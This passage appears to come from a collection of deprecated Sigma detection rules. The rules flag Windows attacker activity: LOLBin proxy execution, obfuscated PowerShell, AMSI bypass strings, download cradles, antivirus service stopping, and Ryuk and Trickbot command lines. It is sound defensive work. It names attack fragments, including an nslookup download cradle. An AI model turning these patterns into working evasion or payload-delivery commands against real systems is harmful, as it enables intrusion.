- Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools
level: high
================================================
FILE: deprecated/windows/proc_creation_win_indirect_cmd.yml
================================================
title: Indirect Command Execution
id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
status: deprecated
description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md
- https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html
author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
date: 2019/10/24
modified: 2023/01/04
tags:
- attack.defense_evasion
- attack.t1202
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- '\pcalua.exe'
- '\forfiles.exe'
condition: selection
fields:
- ComputerName
- User
- ParentCommandLine
- CommandLine
falsepositives:
- Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.
- Legitimate usage of scripts.
level: low
================================================
FILE: deprecated/windows/proc_creation_win_indirect_command_execution_forfiles.yml
================================================
title: Indirect Command Exectuion via Forfiles
id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8
related:
- id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
type: obsolete
status: deprecated
description: Detects execition of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting.
references:
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a
- https://lolbas-project.github.io/lolbas/Binaries/Forfiles/
author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
date: 2022/10/17
modified: 2023/01/04
tags:
- attack.defense_evasion
- attack.t1202
logsource:
product: windows
category: process_creation
detection:
selection_parent:
ParentImage|endswith: '\forfiles.exe'
selection_c:
ParentCommandLine|contains:
- ' /c '
- ' -c '
selection_p:
ParentCommandLine|contains:
- ' /p '
- ' -p '
selection_m:
ParentCommandLine|contains:
- ' /m '
- ' -m '
filter:
Image|endswith: '\cmd.exe'
CommandLine|contains|all:
- 'xcopy'
- 'cmd /c del'
condition: all of selection_* and not filter
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_invoke_obfuscation_via_rundll.yml
================================================
title: Invoke-Obfuscation RUNDLL LAUNCHER
id: 056a7ee1-4853-4e67-86a0-3fd9ceed7555
status: deprecated
description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
references:
- https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23)
author: Timur Zinniatullin, oscd.community
date: 2020/10/18
modified: 2023/02/21
tags:
- attack.defense_evasion
- attack.t1027
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'rundll32.exe'
- 'shell32.dll'
- 'shellexec_rundll'
- 'powershell'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml
================================================
title: Invoke-Obfuscation Via Use Rundll32
id: 36c5146c-d127-4f85-8e21-01bf62355d5a
status: deprecated
description: Detects Obfuscated Powershell via use Rundll32 in Scripts
references:
- https://github.com/SigmaHQ/sigma/issues/1009
author: Nikita Nazarov, oscd.community
date: 2019/10/08
modified: 2022/12/30
tags:
- attack.defense_evasion
- attack.t1027
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- '&&'
- 'rundll32'
- 'shell32.dll'
- 'shellexec_rundll'
CommandLine|contains:
- 'value'
- 'invoke'
- 'comspec'
- 'iex'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_lolbas_execution_of_wuauclt.yml
================================================
title: Monitoring Wuauclt.exe For Lolbas Execution Of DLL
id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0
status: experimental
description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL.
references:
- https://dtm.uk/wuauclt/
author: Sreeman
date: 2020/10/29
modified: 2022/05/27
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains|all:
- 'wuauclt.exe'
- '/UpdateDeploymentProvider'
- '/Runhandlercomserver'
filter:
CommandLine|contains:
- 'wuaueng.dll'
- 'UpdateDeploymentProvider.dll /ClassId'
condition: selection and not filter
falsepositives:
- Wuaueng.dll which is a module belonging to Microsoft Windows Update.
fields:
- CommandLine
level: medium
tags:
- attack.defense_evasion
- attack.execution
- attack.t1218
================================================
FILE: deprecated/windows/proc_creation_win_lolbin_findstr.yml
================================================
title: Abusing Findstr for Defense Evasion
id: bf6c39fc-e203-45b9-9538-05397c1b4f3f
status: deprecated
description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism
references:
- https://lolbas-project.github.io/lolbas/Binaries/Findstr/
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
author: 'Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali'
date: 2020/10/05
modified: 2022/10/12
tags:
- attack.defense_evasion
- attack.t1218
- attack.t1564.004
- attack.t1552.001
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection_findstr:
- CommandLine|contains: findstr
- Image|endswith: 'findstr.exe'
- OriginalFileName: 'FINDSTR.EXE'
selection_cli_download_1:
CommandLine|contains:
- ' /v '
- ' -v '
selection_cli_download_2:
CommandLine|contains:
- ' /l '
- ' -l '
selection_cli_creds_1:
CommandLine|contains:
- ' /s '
- ' -s '
selection_cli_creds_2:
CommandLine|contains:
- ' /i '
- ' -i '
condition: selection_findstr and (all of selection_cli_download* or all of selection_cli_creds*)
falsepositives:
- Administrative findstr usage
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_lolbin_office.yml
================================================
title: Suspicious File Download Using Office Application
id: 0c79148b-118e-472b-bdb7-9b57b444cc19
status: test
description: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files
references:
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/
- https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
author: Beyu Denis, oscd.community
date: 2019/10/26
modified: 2023/02/04
tags:
- attack.command_and_control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\powerpnt.exe'
- '\winword.exe'
- '\excel.exe'
CommandLine|contains: 'http'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_lolbin_rdrleakdiag.yml
================================================
title: Process Memory Dumped Via RdrLeakDiag.EXE
id: 6355a919-2e97-4285-a673-74645566340d
status: deprecated
description: Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory
references:
- https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
author: Florian Roth (Nextron Systems)
date: 2022/01/04
modified: 2023/04/24
tags:
- attack.defense_evasion
- attack.t1036
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection1:
Image|endswith: '\rdrleakdiag.exe'
CommandLine|contains: '/fullmemdmp'
selection2:
CommandLine|contains|all:
- '/fullmemdmp'
- ' /o '
- ' /p '
condition: selection1 or selection2
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_lolbins_by_office_applications.yml
================================================
title: New Lolbin Process by Office Applications
id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8
status: deprecated
description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
references:
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
- https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
- https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml
- https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A
- https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set
author: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)'
date: 2021/08/23
modified: 2023/02/04
tags:
- attack.t1204.002
- attack.t1047
- attack.t1218.010
- attack.execution
- attack.defense_evasion
logsource:
product: windows
category: process_creation
detection:
#useful_information: add more LOLBins to the rules logic of your choice.
selection:
Image|endswith:
- '\regsvr32.exe'
- '\rundll32.exe'
- '\msiexec.exe'
- '\mshta.exe'
- '\verclsid.exe'
- '\msdt.exe'
- '\control.exe'
- '\msidb.exe'
ParentImage|endswith:
- '\winword.exe'
- '\excel.exe'
- '\powerpnt.exe'
- '\msaccess.exe'
- '\mspub.exe'
- '\eqnedt32.exe'
- '\visio.exe'
- '\wordpad.exe'
- '\wordview.exe'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_mal_ryuk.yml
================================================
title: Ryuk Ransomware Command Line Activity
id: 0acaad27-9f02-4136-a243-c357202edd74
related:
- id: c37510b8-2107-4b78-aa32-72f251e7a844
type: similar
status: deprecated
description: Detects Ryuk Ransomware command lines
references:
- https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/
author: Vasiliy Burov
date: 2019/08/06
modified: 2023/02/03
tags:
- attack.execution
- attack.t1204
logsource:
category: process_creation
product: windows
detection:
selection1:
Image|endswith:
- '\net.exe'
- '\net1.exe'
CommandLine|contains: 'stop'
selection2:
CommandLine|contains:
- 'samss'
- 'audioendpointbuilder'
- 'unistoresvc_'
condition: all of selection*
falsepositives:
- Unlikely
level: critical
================================================
FILE: deprecated/windows/proc_creation_win_malware_trickbot_recon_activity.yml
================================================
title: Trickbot Malware Reconnaissance Activity
id: 410ad193-a728-4107-bc79-4419789fcbf8
related:
- id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248
type: similar
status: deprecated
description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.
references:
- https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/
- https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/
author: David Burkett, Florian Roth
date: 2019/12/28
modified: 2023/04/28
tags:
- attack.discovery
- attack.t1482
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\cmd.exe'
Image|endswith: '\nltest.exe'
CommandLine|contains: '/domain_trusts /all_trusts'
condition: selection
falsepositives:
- Rare System Admin Activity
level: high
================================================
FILE: deprecated/windows/proc_creation_win_mavinject_proc_inj.yml
================================================
title: MavInject Process Injection
id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
status: deprecated
description: Detects process injection using the signed Windows tool Mavinject32.exe
author: Florian Roth (Nextron Systems)
references:
- https://twitter.com/gN3mes1s/status/941315826107510784
- https://reaqta.com/2017/12/mavinject-microsoft-injector/
- https://twitter.com/Hexacorn/status/776122138063409152
date: 2018/12/12
modified: 2022/12/19
tags:
- attack.t1055.001
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: ' /INJECTRUNNING '
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_msdt_diagcab.yml
================================================
title: Execute MSDT.EXE Using Diagcab File
id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3
status: deprecated
description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190
references:
- https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0
- https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd
author: GossiTheDog, frack113
date: 2022/06/09
modified: 2023/02/06
tags:
- attack.defense_evasion
- attack.t1202
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\msdt.exe'
- OriginalFileName: 'msdt.exe'
selection_cmd:
CommandLine|contains:
- ' /cab'
- ' -cab'
condition: all of selection_*
falsepositives:
- Legitimate usage of ".diagcab" files
level: high
================================================
FILE: deprecated/windows/proc_creation_win_new_service_creation.yml
================================================
title: New Service Creation
id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab
status: deprecated
description: Detects creation of a new service.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md
author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
date: 2019/10/21
modified: 2023/02/20
tags:
- attack.persistence
- attack.privilege_escalation
- attack.t1543.003
logsource:
category: process_creation
product: windows
detection:
selection_sc:
Image|endswith: '\sc.exe'
CommandLine|contains|all:
- 'create'
- 'binPath'
selection_posh:
CommandLine|contains|all:
- 'New-Service'
- '-BinaryPathName'
condition: 1 of selection*
falsepositives:
- Legitimate administrator or user creates a service for legitimate reasons.
level: low
================================================
FILE: deprecated/windows/proc_creation_win_nslookup_pwsh_download_cradle.yml
================================================
title: Nslookup PwSh Download Cradle
id: 72671447-4352-4413-bb91-b85569687135
status: deprecated
description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
references:
- https://twitter.com/alh4zr3d/status/1566489367232651264
author: Zach Mathis (@yamatosecurity)
date: 2022/09/06
modified: 2022/12/14 # Deprecation date
tags:
- attack.command_and_control
- attack.t1105
- attack.t1071.004
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\powershell.exe'
Image|contains: nslookup
CommandLine|contains: '=txt '
condition: selection
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_odbcconf_susp_exec.yml
================================================
title: Application Whitelisting Bypass via DLL Loaded by odbcconf.exe
id: 65d2be45-8600-4042-b4c0-577a1ff8a60e
status: deprecated
description: Detects defence evasion attempt via odbcconf.exe execution to load DLL
references:
- https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/
- https://twitter.com/Hexacorn/status/1187143326673330176
- https://redcanary.com/blog/raspberry-robin/
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca
author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community
date: 2019/10/25
modified: 2023/05/22
tags:
- attack.defense_evasion
- attack.t1218.008
logsource:
category: process_creation
product: windows
detection:
selection_1_img:
- Image|endswith: '\odbcconf.exe'
- OriginalFileName: 'odbcconf.exe'
selection_1_cli:
CommandLine|contains:
- '-a'
- '-f'
- '/a'
- '/f'
- 'regsvr'
selection_2_parent:
ParentImage|endswith: '\odbcconf.exe'
selection_2_img:
- Image|endswith: '\rundll32.exe'
- OriginalFileName: 'RUNDLL32.EXE'
condition: all of selection_1_* or all of selection_2_*
falsepositives:
- Legitimate use of odbcconf.exe by legitimate user
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml
================================================
title: Excel Proxy Executing Regsvr32 With Payload
id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0
status: deprecated
description: |
Excel called wmic to finally proxy execute regsvr32 with the payload.
An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).
But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it.
Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
references:
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
author: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)'
date: 2021/08/23
modified: 2022/12/02
tags:
- attack.t1204.002
- attack.t1047
- attack.t1218.010
- attack.execution
- attack.defense_evasion
logsource:
product: windows
category: process_creation
detection:
#useful_information: add more LOLBins to the rules logic of your choice.
selection_img:
- Image|endswith: '\wbem\WMIC.exe'
- OriginalFileName: 'wmic.exe'
selection_other:
CommandLine|contains:
- 'regsvr32'
- 'rundll32'
- 'msiexec'
- 'mshta'
- 'verclsid'
ParentImage|endswith:
- '\winword.exe'
- '\excel.exe'
- '\powerpnt.exe'
CommandLine|contains|all:
- 'process'
- 'create'
- 'call'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml
================================================
title: Excel Proxy Executing Regsvr32 With Payload Alternate
id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5
status: deprecated
description: |
Excel called wmic to finally proxy execute regsvr32 with the payload.
An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).
But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it.
Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
references:
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
author: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)'
date: 2021/08/23
modified: 2022/12/02
tags:
- attack.t1204.002
- attack.t1047
- attack.t1218.010
- attack.execution
- attack.defense_evasion
logsource:
product: windows
category: process_creation
detection:
#useful_information: add more LOLBins to the rules logic of your choice.
selection1:
CommandLine|contains:
- 'regsvr32'
- 'rundll32'
- 'msiexec'
- 'mshta'
- 'verclsid'
selection2:
- Image|endswith: '\wbem\WMIC.exe'
- CommandLine|contains: 'wmic '
selection3:
ParentImage|endswith:
- '\winword.exe'
- '\excel.exe'
- '\powerpnt.exe'
selection4:
CommandLine|contains|all:
- 'process'
- 'create'
- 'call'
condition: all of selection*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_office_spawning_wmi_commandline.yml
================================================
title: Office Applications Spawning Wmi Cli Alternate
id: 04f5363a-6bca-42ff-be70-0d28bf629ead
status: deprecated
description: Initial execution of malicious document calls wmic to execute the file with regsvr32
references:
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)
date: 2021/08/23
modified: 2023/02/04
tags:
- attack.t1204.002
- attack.t1047
- attack.t1218.010
- attack.execution
- attack.defense_evasion
logsource:
product: windows
category: process_creation
detection:
#useful_information: Add more office applications to the rule logic of choice
selection1:
- Image|endswith: '\wbem\WMIC.exe'
- CommandLine|contains: 'wmic '
selection2:
ParentImage|endswith:
- '\winword.exe'
- '\excel.exe'
- '\powerpnt.exe'
- '\msaccess.exe'
- '\mspub.exe'
- '\eqnedt32.exe'
- '\visio.exe'
condition: all of selection*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_possible_applocker_bypass.yml
================================================
title: Possible Applocker Bypass
id: 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719
status: deprecated
description: Detects execution of executables that can be used to bypass Applocker whitelisting
references:
- https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt
- https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1127.001/T1127.001.md
author: juju4
date: 2019/01/16
modified: 2022/11/03
tags:
- attack.defense_evasion
- attack.t1218.004
- attack.t1218.009
- attack.t1127.001
- attack.t1218.005
- attack.t1218 # no way to map 1:1, so the technique level is required
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '\msdt.exe'
- '\installutil.exe'
- '\regsvcs.exe'
- '\regasm.exe'
#- '\regsvr32.exe' # too many FPs, very noisy
- '\msbuild.exe'
- '\ieexec.exe'
#- '\mshta.exe'
#- '\csc.exe'
condition: selection
falsepositives:
- False positives depend on scripts and administrative tools used in the monitored environment
- Using installutil to add features for .NET applications (primarily would occur in developer environments)
level: low
================================================
FILE: deprecated/windows/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml
================================================
title: PowerShell AMSI Bypass Pattern
id: 4f927692-68b5-4267-871b-073c45f4f6fe
status: deprecated
description: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.
author: '@Kostastsale'
references:
- https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
date: 2022/11/04
modified: 2023/02/03
tags:
- attack.defense_evasion
- attack.t1562.001
- attack.execution
logsource:
product: windows
category: process_creation
detection:
selection1:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- '\powershell_ise.exe'
CommandLine|contains|all:
- '[Ref].Assembly.GetType'
- 'SetValue($null,$true)'
- 'NonPublic,Static'
condition: selection1
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml
================================================
title: Malicious Base64 Encoded Powershell Invoke Cmdlets
id: fd6e2919-3936-40c9-99db-0aa922c356f7
related:
- id: 6385697e-9f1b-40bd-8817-f4a91f40508e
type: similar
status: deprecated
description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets
references:
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
author: pH-T (Nextron Systems)
date: 2022/05/31
modified: 2023/01/30
tags:
- attack.execution
- attack.t1059.001
- attack.defense_evasion
- attack.t1027
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
# Invoke-BloodHound
- 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA'
- 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA'
- 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA'
# Invoke-Mimikatz
- 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA'
- 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A'
- 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg'
# Invoke-WMIExec
- 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA'
- 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw'
- 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA'
condition: selection
fields:
- CommandLine
falsepositives:
- Unlikely
level: high
================================================
FILE: deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml
================================================
title: Base64 Encoded Listing of Shadowcopy
id: 47688f1b-9f51-4656-b013-3cc49a166a36
status: deprecated
description: Detects base64 encoded listing Win32_Shadowcopy
references:
- https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
author: Christian Burkard (Nextron Systems)
date: 2022/03/01
modified: 2023/01/30
tags:
- attack.execution
- attack.t1059.001
- attack.defense_evasion
- attack.t1027
logsource:
category: process_creation
product: windows
detection:
selection:
# Win32_Shadowcopy | ForEach-Object
CommandLine|contains:
- 'VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQA'
- 'cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A'
- 'XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdA'
condition: selection
fields:
- CommandLine
- ParentCommandLine
falsepositives:
- Unlikely
level: high
================================================
FILE: deprecated/windows/proc_creation_win_powershell_base64_shellcode.yml
================================================
title: Potential PowerShell Base64 Encoded Shellcode
id: 2d117e49-e626-4c7c-bd1f-c3c0147774c8
status: deprecated
description: Detects potential powershell Base64 encoded Shellcode
references:
- https://twitter.com/cyb3rops/status/1063072865992523776
author: Florian Roth (Nextron Systems)
date: 2018/11/17
modified: 2023/04/06
tags:
- attack.defense_evasion
- attack.t1027
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'OiCAAAAYInlM'
- 'OiJAAAAYInlM'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_powershell_bitsjob.yml
================================================
title: Suspicious Bitsadmin Job via PowerShell
id: f67dbfce-93bc-440d-86ad-a95ae8858c90
status: deprecated
description: Detect download by BITS jobs via PowerShell
references:
- https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
author: Endgame, JHasenbusch (ported to sigma for oscd.community)
date: 2018/10/30
modified: 2022/11/21
tags:
- attack.defense_evasion
- attack.persistence
- attack.t1197
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains: 'Start-BitsTransfer'
condition: selection
fields:
- ComputerName
- User
- CommandLine
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_powershell_download_cradles.yml
================================================
title: PowerShell Web Download
id: 6e897651-f157-4d8f-aaeb-df8151488385
status: deprecated
description: Detects suspicious ways to download files or content using PowerShell
references:
- https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
author: Florian Roth (Nextron Systems)
date: 2022-03-24
modified: 2025-07-18
tags:
- attack.command-and-control
- attack.execution
- attack.t1059.001
- attack.t1105
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains:
- '.DownloadString('
- '.DownloadFile('
- 'Invoke-WebRequest '
- 'iwr '
condition: selection
falsepositives:
- Scripts or tools that download files
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_powershell_service_modification.yml
================================================
title: Stop Or Remove Antivirus Service
id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b
status: deprecated
description: |
Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.
Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
- https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
author: frack113
date: 2021/07/07
modified: 2023/03/04
tags:
- attack.defense_evasion
- attack.t1562.001
logsource:
category: process_creation
product: windows
detection:
selection_action:
CommandLine|contains:
- 'Stop-Service '
- 'Remove-Service '
selection_product:
CommandLine|contains:
# Feel free to add more service name
- ' McAfeeDLPAgentService'
- ' Trend Micro Deep Security Manager'
- ' TMBMServer'
- 'Sophos'
- 'Symantec'
condition: all of selection*
fields:
- ComputerName
- User
- CommandLine
- ParentCommandLine
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_powershell_susp_ps_downloadfile.yml
================================================
title: PowerShell DownloadFile
id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5
status: deprecated # Deprecated in favor of 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
references:
- https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
author: Florian Roth (Nextron Systems)
date: 2020-08-28
modified: 2025-10-20
tags:
- attack.execution
- attack.t1059.001
- attack.command-and-control
- attack.t1104
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'powershell'
- '.DownloadFile'
- 'System.Net.WebClient'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_powershell_xor_encoded_command.yml
================================================
title: Potential Xor Encoded PowerShell Command
id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6
related:
- id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f
type: similar
status: deprecated
description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65
